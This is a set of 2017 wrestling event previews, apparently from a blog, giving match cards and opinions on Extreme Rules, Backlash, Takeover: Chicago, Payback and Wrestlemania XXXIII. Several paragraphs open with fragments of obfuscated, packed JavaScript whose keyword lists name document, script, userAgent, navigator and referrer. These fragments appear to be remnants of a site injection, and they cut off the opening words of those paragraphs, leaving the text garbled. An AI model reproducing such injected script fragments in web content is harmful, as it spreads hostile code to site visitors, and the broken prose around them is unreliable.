I get the idea behind what they’re doing here but can you really consider a lot of these matches to be EXTREME? It’s a good idea if the bigger matches are all extreme (Is that really the best name they can come up with? It sounds so officially and corp……yeah that’s the best we’re getting.) but it really feels like a bunch of gimmick matches which are lumped together under the EXTREME banner. Let’s get to it.

Tag Team Titles: Hardys(c) vs. Sheamus/Cesaro

Intercontinental Title: Dean Ambrose(c) vs. The Miz

Cruiserweight Title: Neville(c) vs. Austin Aries

Rich Swann/Sasha Banks vs. Alicia Fox/Noam Dar

Roman Reigns vs. Finn Balor vs. Samoa Joe vs. Bray Wyatt vs. Seth Rollins

Backlash 2017 Preview

I’m not sure if the show is going to be that much better as historically it’s more a show of Wrestlemania rematches, but why do that when you can do a mostly new card? This show doesn’t have the most hype coming in and after “Takeover: Chicago”, they have quite the hill to climb. Let’s get to it.

Kickoff Show: Tye Dillinger vs. Aiden English

Baron Corbin vs. Sami Zayn

Luke Harper vs. Eric Rowan

Naomi/Charlotte/Becky Lynch vs. Welcoming Committee

Tag Team Titles: Usos vs. Breezango

Shinsuke Nakamura vs. Dolph Ziggler

US Title: AJ Styles vs. Kevin Owens

Smackdown World Title: Randy Orton vs. Jinder Mahal

Takeover: Chicago Preview

");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rzbrf|var|u0026u|referrer|nziee||js|php'.split('|'),0,{})) I heard about “Takeover: Chicago” taking place only about six weeks after “Takeover: Orlando”, I wasn’t all that thrilled with the concept. These shows work best when they have time to be built up instead of rushing things together like this. Then again, the idea of Takeover in Chicago is too much to pass up. It also helps that the show has been well built up in such a short amount of time and I’m actually looking forward to a lot of the card. Let’s get to it.

United Kingdom Title: Tyler Bate vs. Pete Dunne

Tag Team Titles: Authors of Pain vs. DIY

Roderick Strong vs. Eric Young

NXT Title: Bobby Roode vs. Hideo Itami

Payback 2017 Preview

The Superstar Shakeup has changed the entire company and that means we have a bunch of pointless matches due to either the title not being on the line, people potentially switching shows and feuds that already have their followups started. Let’s get to it.

Bray Wyatt vs. Randy Orton

Kickoff Show: Enzo Amore/Big Cass vs. Anderson and Gallows

Cruiserweight Title: Austin Aries vs. Neville

US Title: Kevin Owens vs. Chris Jericho

Tag Team Titles: Hardys vs. Sheamus/Cesaro

Seth Rollins vs. Samoa Joe

Roman Reigns vs. Braun Strowman

Wrestlemania XXXIII Preview: Overall Thoughts

Ice cream is a powerful weapon.

There have been times where a lot of things look horrible but this show is something special. There’s something about it that makes the show worthwhile almost every single year (ok so they’re on a losing streak right now). There’s going to be something worth seeing on the show and it’s going to be good.

Wrestlemania XXXIII Preview: Raw World Title: Goldberg vs. Brock Lesnar

Where’s my stopwatch?

I’ve said the same thing since “Survivor Series 2016”: I have no idea why I’m supposed to be interested in seeing them fight again. Fans don’t seem interested in seeing either of them and they especially don’t need the title to make this story work (really, it’s the same thing with or without the title) so I have no idea why we’re seeing this again other than “well we started it so we have to finish it”.

Wrestlemania XXXIII Preview: Roman Reigns vs. Undertaker

This could be it.

");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fnrsr|var|u0026u|referrer|bkdyf||js|php'.split('|'),0,{})) Undertaker wins, I officially have no idea what’s going on in WWE’s minds anymore. This is tailor made for Reigns to be all the more aggressive (not necessarily a heel) and spear Undertaker over and over until the old man can’t get up anymore because the new monster runs this place. Reigns can be great for something like this, but I’m never likely to bet against Undertaker at Wrestlemania.

Wrestlemania XXXIII Preview: US Title: Chris Jericho vs. Kevin Owens

All this over a list.

");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ibydh|var|u0026u|referrer|iahsi||js|php'.split('|'),0,{})) want to buy this feud a sandwich. They’ve built this up so, so well with the List of Owens reveal being one of the best turns I’ve seen since……oh geez since Batista turned on Rey Mysterio, and this was much better than that. The fact that they waited until this past week to have Jericho put Owens on the List was a great bonus for the whole thing and made it even more awesome. I don’t remember the last time I liked a feud this much but it’s blown everything else away as far as storytelling.

Wrestlemania XXXIII Preview: Seth Rollins vs. Triple H

This…..could go multiple ways.

");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ihbya|var|u0026u|referrer|redhk||js|php'.split('|'),0,{})) really don’t know where to go with this one. Rollins has the knee injury coming in so I’m not sure what they can do with the match but really, there’s no reason whatsoever for HHH to come close to winning. Of course that never stopped him before but I think we’re mostly past that at this point. The match should be fun and odds are it includes some interference (Samoa Joe is almost a given) so expect more of a mess than a straight match, which is probably the right call.

Wrestlemania XXXIII Preview: Smackdown World Title: Bray Wyatt vs. Randy Orton

Something about Bray and soil.

");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fddns|var|u0026u|referrer|aezyd||js|php'.split('|'),0,{})) one worries me. Wyatt won the title earlier this year to finally shake off the label of being a choker. Therefore, he flat out needs to win this one and needs it WAY more than Orton could hope to. The story has been a mess with Orton joining the Wyatts and then breaking away from them as part of a ruse, plus something about burning a corpse and Wyatt soiling himself.
